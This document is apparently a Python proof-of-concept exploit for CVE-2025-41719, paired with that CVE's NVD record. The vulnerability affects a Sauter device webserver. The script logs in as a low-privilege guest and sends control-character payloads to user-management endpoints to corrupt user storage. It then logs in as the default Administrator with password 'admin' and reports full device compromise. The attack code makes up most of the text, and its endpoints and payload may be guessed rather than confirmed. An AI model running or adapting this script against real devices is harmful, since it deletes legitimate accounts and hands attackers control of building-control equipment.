CVE-2025-41719

# CVE-2025-41719 PoC - Sauter Webserver User Storage Corruption # Exploits improper input validation in user management module # Results in deletion of all users and creation of default Administrator import requests import sys TARGET_URL = "http://target-device/api/users" LOW_PRIV_USER = "guest" LOW_PRIV_PASS = "guest" # Malicious payload: sequence of unsupported/control characters # These characters corrupt the user storage parsing logic MALICIOUS_PAYLOAD = "\x00\r\n\x1a\xff\xfe\x00\x01" def exploit(target, username, password): session = requests.Session() # Step 1: Authenticate as low-privileged user login_url = f"{target}/api/auth/login" login_data = {"username": username, "password": password} try: resp = session.post(login_url, json=login_data, timeout=10) if resp.status_code != 200: print(f"[-] Login failed: {resp.status_code}") return False print(f"[+] Logged in as low-priv user: {username}") except Exception as e: print(f"[-] Connection error: {e}") return False # Step 2: Send malicious payload to user storage endpoint # Inject unsupported character sequence to corrupt user storage user_config = { "username": MALICIOUS_PAYLOAD, "password": "test", "role": "viewer" } try: resp = session.post(f"{target}/api/users", json=user_config, timeout=10) print(f"[+] Payload sent. Response: {resp.status_code}") except Exception as e: print(f"[-] Payload delivery error: {e}") # Step 3: Trigger storage corruption by submitting malformed data corrupt_data = { "operation": "update", "user_id": 1, "field": "username", "value": MALICIOUS_PAYLOAD * 10 } try: resp = session.put(f"{target}/api/users/1", json=corrupt_data, timeout=10) print(f"[+] Corruption triggered. Response: {resp.status_code}") except Exception as e: print(f"[-] Corruption request error: {e}") # Step 4: Verify default Administrator account exists admin_url = f"{target}/api/auth/login" admin_data = {"username": "Administrator", "password": "admin"} try: resp = requests.post(admin_url, json=admin_data, timeout=10) if resp.status_code == 200: print("[+] SUCCESS: Default Administrator account accessible!") print("[+] Full device compromise achieved.") return True except Exception as e: print(f"[-] Verification error: {e}") return False if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL exploit(target, LOW_PRIV_USER, LOW_PRIV_PASS)

{"cve": {"id": "CVE-2025-41719", "sourceIdentifier": "[email protected]", "published": "2025-10-22T07:15:33.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A low privileged remote attacker can corrupt the webserver users storage on the device by setting a sequence of unsupported characters which leads to deletion of all previously configured users and the creation of the default Administrator with a known default password."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1286"}]}], "references": [{"url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json", "source": "[email protected]"}]}}